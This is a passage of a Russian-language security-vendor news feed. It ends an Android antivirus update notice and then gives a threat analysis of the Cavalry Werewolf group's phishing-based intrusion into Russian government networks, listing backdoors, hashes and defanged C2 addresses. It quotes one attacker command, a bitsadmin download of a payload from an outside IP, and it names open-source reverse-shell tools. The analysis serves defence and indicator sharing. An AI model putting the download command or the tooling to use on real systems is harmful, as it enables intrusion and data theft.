особенным&lt;/h3&gt;&lt;p&gt;Новая функция автоматической обработки угроз, которая позволяет решениям Dr.Web удалять вредоносные объекты, блокировать подозрительные ссылки или изолировать потенциально опасные приложения без задержек и ручного вмешательства пользователя.&amp;nbsp;&lt;/p&gt;&lt;h3&gt;Что это значит для пользователей&lt;/h3&gt;&lt;p&gt;Теперь у пользователей персональных устройств нет необходимости следить за всеми уведомлениями об угрозах, как раньше, потому что можно полностью исключить ручное реагирование. Это сделано для того, чтобы реакция антивирусного продукта не зависела от ответа пользователя на уведомления системы об обнаруженных угрозах и действиях с ними. Интеллектуальная система, разработанная специалистами «Доктор Веб», самостоятельно устраняет угрозы в режиме реального времени в соответствии с заданными параметрами реагирования на те или иные типы вредоносного ПО.&amp;nbsp;&lt;br&gt;Особенно порадует это решение корпоративных пользователей. Автоматическое удаление вредоносных объектов, блокировка подозрительных ссылок и многие другие действия происходят мгновенно без непосредственного участия администраторов. Функция также поддерживается и со стороны Центра управления.&lt;/p&gt;&lt;h3&gt;Администрирование стало еще удобнее&lt;/h3&gt;&lt;p&gt;Данное обновление добавляет возможность централизованно управлять действиями компонентов Сканер и SpIDer Guard при обнаружении различных типов угроз на устройствах под управлением ОС Android. Теперь администратор может задать, как агент Dr.Web будет реагировать на угрозы — уведомлять, удалять или игнорировать их в зависимости от категории.&lt;/p&gt;&lt;div class="alert"&gt;&lt;p&gt;&lt;strong&gt;Важное уведомление!&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;Начиная с новой версии прекращается поддержка Android ОС версии 4.4. Просьба обратить на это внимание при обновлении.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Если вы используете версию Dr.Web Security Space для мобильных устройств, скачанную с официального сайта «Доктор Веб», для обновления необходимо полностью переустановить приложение — скачайте последнюю версию агента и установите ее.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Для пользователей Dr.Web Security Space для мобильных устройств, скачавших приложение из Google Play, использующих Dr.Web по подписке (Dr.Web Мобильный или Dr.Web Расширенный) или Dr.Web Mobile Security Suite, обновление пройдет в штатном режиме.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15078&amp;lng=kk</guid><title>Хакерская группировка Cavalry Werewolf атакует российские государственные учреждения</title><link>https://news.drweb.kz/show/?i=15078&amp;lng=kk&amp;c=5</link><pubDate>Thu, 06 Nov 2025 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;6 ноября 2025 года&lt;/b&gt;&lt;/p&gt;
&lt;h3&gt;Введение&lt;/h3&gt;
&lt;p&gt;&lt;newslead&gt;В июле 2025 года в компанию «Доктор Веб» обратился клиент из государственного сектора Российской Федерации с подозрением о возможной компрометации внутренней сети. Гипотеза возникла в связи с тем, что клиент зафиксировал рассылку нежелательных сообщений с одного из корпоративных почтовых ящиков. Проведенное нашей антивирусной лабораторией расследование инцидента показало, что учреждение подверглось целевой атаке со стороны хакерской группировки, которую специалисты «Доктор Веб» идентифицировали как Cavalry Werewolf. Одной из целей кампании был сбор конфиденциальной информации и данных о конфигурации сети.&lt;/newslead&gt;&lt;/p&gt;
&lt;p&gt;В ходе экспертизы удалось выявить ранее неизвестные вредоносные программы, в том числе инструменты с открытым исходным кодом. Среди них — различные бэкдоры, позволяющие дистанционно выполнять команды в атакуемых системах и подготовить площадку для разведки и дальнейшего закрепления в сетевой инфраструктуре.&lt;/p&gt;
&lt;p&gt;В данном исследовании мы расскажем о выявленных инструментах хакеров Cavalry Werewolf, рассмотрим особенности группировки и характерные для злоумышленников действия в скомпрометированной сети.&lt;/p&gt;
&lt;h3&gt;Общие сведения об атаке и используемые инструменты&lt;/h3&gt;
&lt;p&gt;Для получения первоначального доступа к одному из компьютеров злоумышленники использовали распространенный вектор проникновения — фишинговые электронные письма с прикрепленным к ним вредоносным ПО, замаскированным под документы. В данном случае сообщения содержали неизвестный на момент атаки бэкдор &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ShellNET.1&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;&lt;/a&gt;, который основан на ПО с открытым кодом &lt;a href="https://github.com/xcyraxx/Reverse-Shell-CS" target="_blank"&gt;Reverse-Shell-CS&lt;/a&gt;. Он позволяет дистанционно подключаться к зараженным компьютерам через обратный шелл и выполнять различные команды. Эта вредоносная программа располагалась в защищенном паролем архиве и, в зависимости от рассылки, имела различные имена.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Варианты имен файлов BackDoor.ShellNET.1&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;Службеная записка от 16.06.2025___________________________.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О проведении личного приема граждан список участников.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О работе почтового сервера план и проведенная работа.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/october/cavalry_werewolf/01_phishing.2.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/october/cavalry_werewolf/01_phishing.2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;Пример фишингового письма с &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;. Атакующие предлагают потенциальной жертве ознакомиться с «документом» и указывают пароль для распаковки архива&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Используя &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;, злоумышленники продолжили закрепление в целевой системе. Они загрузили несколько вредоносных программ через стандартное для ОС Windows средство Bitsadmin (&lt;span class="string"&gt;C:\Windows\SysWOW64\bitsadmin.exe&lt;/span&gt;), предназначенное для управления заданиями по передаче файлов. Приложение запускалось с набором определенных ключей командной строки и от имени текущего администратора системы, как показано на примере ниже:&lt;/p&gt;
&lt;div class="grid"&gt;
&lt;pre&gt;&lt;code&gt;cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;Первой из угроз, загруженных через &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;, была троянская программа-стилер &lt;a href="https://vms.drweb.kz/search/?q=Trojan.FileSpyNET.5&amp;lng=kk"&gt;&lt;b&gt;Trojan.FileSpyNET.5&lt;/b&gt;&lt;/a&gt;. С ее помощью киберпреступники скачали хранившиеся на компьютере документы в форматах .doc, .docx, .xlsx и .pdf, текстовые файлы (.txt), а также изображения (.jpg, .png).&lt;/p&gt;
&lt;p&gt;Затем атакующие установили бэкдор &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.Tunnel.41&amp;lng=kk"&gt;&lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;&lt;/a&gt; (представляет собой ПО с открытым исходным кодом &lt;a href="https://github.com/Acebond/ReverseSocks5" target="_blank"&gt;ReverseSocks5&lt;/a&gt;) с целью создания SOCKS5-туннелей и незаметного подключения к компьютеру для дальнейшего выполнения на нем команд, в том числе — с возможностью установки другого вредоносного ПО.&lt;/p&gt;
&lt;h3&gt;Инструменты Cavalry Werewolf&lt;/h3&gt;
&lt;p&gt;Расследование данного инцидента позволило выявить не только указанные выше вредоносные приложения, но и множество других инструментов группировки, которые хакеры используют для проведения таргетированных атак. Отметим, что вирусописатели из Cavalry Werewolf не ограничиваются единым набором вредоносных программ и постоянно пополняют свой арсенал. Поэтому инструменты для проникновения в целевые системы, а также последующие в цепочке заражения стадии могут отличаться в зависимости от атакуемой организации.&lt;/p&gt;
&lt;h3&gt;Точка входа&lt;/h3&gt;
&lt;p&gt;Вредоносные программы в фишинговых письмах от Cavalry Werewolf являются первыми ступенями в цепочке заражения. При этом они могут быть представлены разным типом вредоносного ПО. Вирусные аналитики «Доктор Веб» выявили следующие варианты:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;скрипты (&lt;a href="https://vms.drweb.kz/search/?q=BAT.DownLoader.1138&amp;lng=kk"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
    &lt;li&gt;исполняемые файлы (&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Packed2.49708&amp;lng=kk"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Siggen31.54011&amp;lng=kk"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.Siggen2.5463&amp;lng=kk"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.RShell.169&amp;lng=kk"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ReverseShell.10&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Является пакетным файлом, который загружает в целевую систему PowerShell-бэкдор &lt;b&gt;PowerShell.BackDoor.109&lt;/b&gt;. С его помощью злоумышленники скачивают и запускают на компьютере другие вредоносные программы.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BAT.DownLoader.1138&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;scan26_08_2025.bat&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;d2106c8dfd0c681c27483a21cc72d746b2e5c18c&lt;/td&gt;
            &lt;td&gt;168[.]100.10[.]73&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Устанавливает бэкдор &lt;b&gt;BackDoor.Spy.4033&lt;/b&gt;, который в зашифрованном виде хранится в его теле. Этот бэкдор позволяет атакующим выполнять команды в инфицированной системе через обратный шелл.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов Trojan.Packed2.49708&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;О проведении личного приема граждан список участников план и проведенная работа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string" style="text-wrap: nowrap;"&gt;C:\Windows\2o1nzu.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;5684972ded765b0b08b290c85c8fac8ed3fea273&lt;/td&gt;
            &lt;td&gt;185[.]173.37[.]67&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;29ee3910d05e248cfb3ff62bd2e85e9c76db44a5&lt;/td&gt;
            &lt;td&gt;185[.]231.155[.]111&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;О работе почтового сервера план и проведенная работа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;План-протокол встречи о сотрудничестве представителей должн.лиц.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;ce4912e5cd46fae58916c9ed49459c9232955302&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]95&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string" style="text-wrap: nowrap;"&gt;C:\Windows\746wljxfs.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;653ffc8c3ec85c6210a416b92d828a28b2353c17&lt;/td&gt;
            &lt;td&gt;185[.]173.37[.]67&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;—&lt;/td&gt;
            &lt;td&gt;b52e1c9484ab694720dc62d501deca2aa922a078&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]95&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Устанавливает бэкдор &lt;b&gt;BackDoor.Spy.4038&lt;/b&gt;, который в зашифрованном виде хранится в его теле. Этот бэкдор позволяет атакующим выполнять команды в инфицированной системе через обратный шелл.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Siggen31.54011&amp;lng=kk"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt; функционально схож с вредоносной программой &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Packed2.49708&amp;lng=kk"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;, но имеет несколько иной алгоритм извлечения полезной нагрузки.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;baab225a50502a156222fcc234a87c09bc2b1647&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;93000d43d5c54b07b52efbdad3012e232bdb49cc&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Выполняет задания киберпреступников и управляется ими через Telegram-бот. Основная функциональность вредоносной программы расположена в PowerShell-коде, скрытом в ее теле.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.Siggen2.5463&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Полезная нагрузка&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;system.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;c96beb026dc871256e86eca01e1f5ba2247a0df6&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;PowerShell.BackDoor.108&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Позволяет злоумышленникам дистанционно подключаться к зараженным компьютерам через обратный шелл для выполнения различных команд.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.RShell.169&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;633885f16ef1e848a2e057169ab45d363f3f8c57&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Запускает обратный шелл и обеспечивает злоумышленникам дистанционный доступ к системе.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.ReverseShell.10&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;к проектам.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;dd98dcf6807a7281e102307d61c71b7954b93032&lt;/td&gt;
            &lt;td&gt;195[.]2.78[.]133&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td style="text-align:start;"&gt;
                &lt;span class="string" style="white-space: pre-wrap;"&gt;Служебная записка от 20.08.2025&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string" style="white-space: pre-wrap;"&gt;Служебная записка от 12.08.2025&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
            &lt;/td&gt;
            &lt;td&gt;f546861adc7c8ca88e3b302d274e6fffb63de9b0&lt;/td&gt;
            &lt;td&gt;62[.]113.114[.]209&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;h3&gt;Последующие ступени заражения&lt;/h3&gt;
&lt;p&gt;Нами были обнаружены следующие вредоносные программы, которые могут в дальнейшем устанавливаться на зараженные устройства после компрометации:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Inject5.57968&amp;lng=kk"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ShellNET.2&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ReverseProxy.1&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Packed2.49862&amp;lng=kk"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Троянская программа с зашифрованным в ее теле бэкдором, который позволяет атакующим загружать вредоносные приложения на зараженный компьютер. Расшифровка полезной нагрузки выполняется в несколько шагов, на одном из которых вредоносный массив данных инжектируется в процесс приложения &lt;span class="string"&gt;aspnet_compiler.exe&lt;/span&gt; из пакета Microsoft .NET Framework. В дальнейшем полностью расшифрованный бэкдор работает в контексте процесса этого легитимного приложения.&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/october/cavalry_werewolf/02_vxcube_analysis.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/october/cavalry_werewolf/02_vxcube_analysis.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;Изучение активности &lt;b&gt;Trojan.Inject5.57968&lt;/b&gt; при помощи «песочницы» интерактивного анализатора угроз Dr.Web vxCube&lt;/em&gt;&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов Trojan.Inject5.57968&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Полезная нагрузка&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;pickmum1.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e840c521ec436915da71eb9b0cfd56990f4e53e5&lt;/td&gt;
            &lt;td&gt;64[.]95.11[.]202&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.PackedNET.3351&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;mummyfile1.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;22641dea0dbe58e71f93615c208610f79d661228&lt;/td&gt;
            &lt;td&gt;64[.]95.11[.]202&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.PackedNET.3351&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Бэкдор, который управляется через Telegram-бот и выполняет команды атакующих.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.ShellNET.2&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;win.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;1957fb36537df5d1a29fb7383bc7cde00cd88c77&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Бэкдор на основе открытого ПО ReverseSocks5, запускающий обратный SOCS5-прокси в инфицированной системе для получения дистанционного доступа к компьютеру. &lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt; запускается через командную строку cmd.exe с параметром &lt;span class="string"&gt;-connect IP&lt;/span&gt; для подключения к нужному сетевому адресу. Известны модификации бэкдора с зашитыми адресами.&lt;/p&gt;
&lt;p&gt;Выявлены следующие IP:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;78[.]128.112[.]209&lt;/span&gt; (указывался в параметре запуска)&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;96[.]9.125[.]168&lt;/span&gt; (указывался в параметре запуска)&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;188[.]127.231[.]136&lt;/span&gt; (зашит в коде)&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;revv2.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;6ec8a10a71518563e012f4d24499b12586128c55&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/p&gt;
